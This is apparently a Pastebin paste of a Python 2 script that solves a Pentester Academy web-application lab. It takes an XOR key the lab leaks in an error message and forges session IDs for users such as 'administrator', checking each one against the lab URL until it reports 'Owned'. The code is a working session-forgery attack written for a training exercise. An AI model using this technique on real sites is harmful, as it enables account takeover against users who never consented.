Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # http://pentesteracademylab.appspot.com/lab/webapp/sid/1?sid=Bg8WF0U=
- # The challenge is to find the correct session.
- # Tip1 - by removing 'Bg8WF0U='from the URL you get the following tip
- # Error executing function: def EncryptUsingXOR(base64_text, enc_key='azsd123443'): base64_text is None
- import base64
- import urllib2
- import md5
- import sys
- url = "http://pentesteracademylab.appspot.com/lab/webapp/sid/1?sid="
- key = "azsd123443"
- users = ["administrator", "vivek", "jack"]
- def get_response(url):
- output = urllib2.urlopen(url).read()
- return output
- def xor(data, key):
- return bytearray(a^b for a, b in zip(*map(bytearray, [data, key])))
- baseline = get_response("http://pentesteracademylab.appspot.com/lab/webapp/sid/1?sid=Bg8WF0U=")
- md5_base = md5.new(baseline).hexdigest()
- for I in range(len(users)):
- session = base64.encodestring(xor(users[I], key))
- url2 = url+session.rstrip()
- poc = get_response(url2)
- if md5_base != md5.new(poc).hexdigest():
- print "Yeahhhhh - Owned"
- print "user: ", users[I], " session id: ", session
- print "url: ", url2
- sys.exit()
- # Theory
- # https://en.wikipedia.org/wiki/XOR_cipher
- # http://stackoverflow.com/questions/20557999/xor-python-text-encryption-decryption
Add Comment
Please, Sign In to add comment